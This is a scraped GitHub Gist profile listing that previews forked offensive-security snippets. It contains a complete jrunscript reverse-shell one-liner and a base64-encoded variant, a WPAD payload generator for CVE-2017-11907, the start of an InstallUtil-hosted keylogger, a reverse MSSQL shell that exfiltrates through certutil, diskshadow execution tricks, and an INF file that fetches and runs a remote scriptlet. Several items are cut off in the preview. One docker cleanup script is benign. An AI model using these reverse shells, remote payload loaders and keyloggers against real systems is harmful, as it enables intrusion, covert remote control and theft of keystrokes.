Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
View GitHub Profile
@sasqwatch
sasqwatch / JVM_POST_EXPLOIT.md
Created Jan 30, 2018 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@sasqwatch
sasqwatch / README.md
Created Feb 26, 2018 — forked from jthuraisamy/README.md
CVE-2017-11907 WPAD.dat Generator for Responder
View README.md

Usage

This script generates a payload for use with Responder.

  1. Generate a payload with main.py
  2. Copy and paste the one-liner output into the WPADScript field of Responder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
@sasqwatch
sasqwatch / InstallUtilMouseKeyLogger.cs
Created Feb 27, 2018
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
View InstallUtilMouseKeyLogger.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
@sasqwatch
sasqwatch / docker_kill.sh
Created Mar 8, 2018 — forked from evanscottgray/docker_kill.sh
kill all docker containers at once...
View docker_kill.sh
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt
@sasqwatch
sasqwatch / mandros.py
Created Mar 22, 2018 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@sasqwatch
sasqwatch / Insomnihack_Teaser_2017_winworld_exploit.py
Created Jan 7, 2019 — forked from j00ru/Insomnihack_Teaser_2017_winworld_exploit.py
Insomni'hack Teaser 2017 "winworld" exploit by Mateusz "j00ru" Jurczyk
View Insomnihack_Teaser_2017_winworld_exploit.py
# Insomni'hack Teaser 2017 "winworld" task exploit
#
# Author: Mateusz "j00ru" Jurczyk
# Date: 21 January 2017
#
import os
import random
import string
import sys
import struct
@sasqwatch
sasqwatch / WCTF_2018_searchme_exploit.cpp
Created Jan 7, 2019 — forked from j00ru/WCTF_2018_searchme_exploit.cpp
WCTF 2018 "searchme" exploit by Mateusz "j00ru" Jurczyk
View WCTF_2018_searchme_exploit.cpp
// WCTF 2018 "searchme" task exploit
//
// Author: Mateusz "j00ru" Jurczyk
// Date: 6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>
View diskshadow.txt
Execute
=======
*Interactive Mode
cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit
View ieuinit.inf
[version]
signature="$CHICAGO$"
AdvancedINF=2.0
[DefaultInstall.Windows7]
UnRegisterOCXs=FunRun
[FunRun]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct
View calc_exe.inf
; DRIVER.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385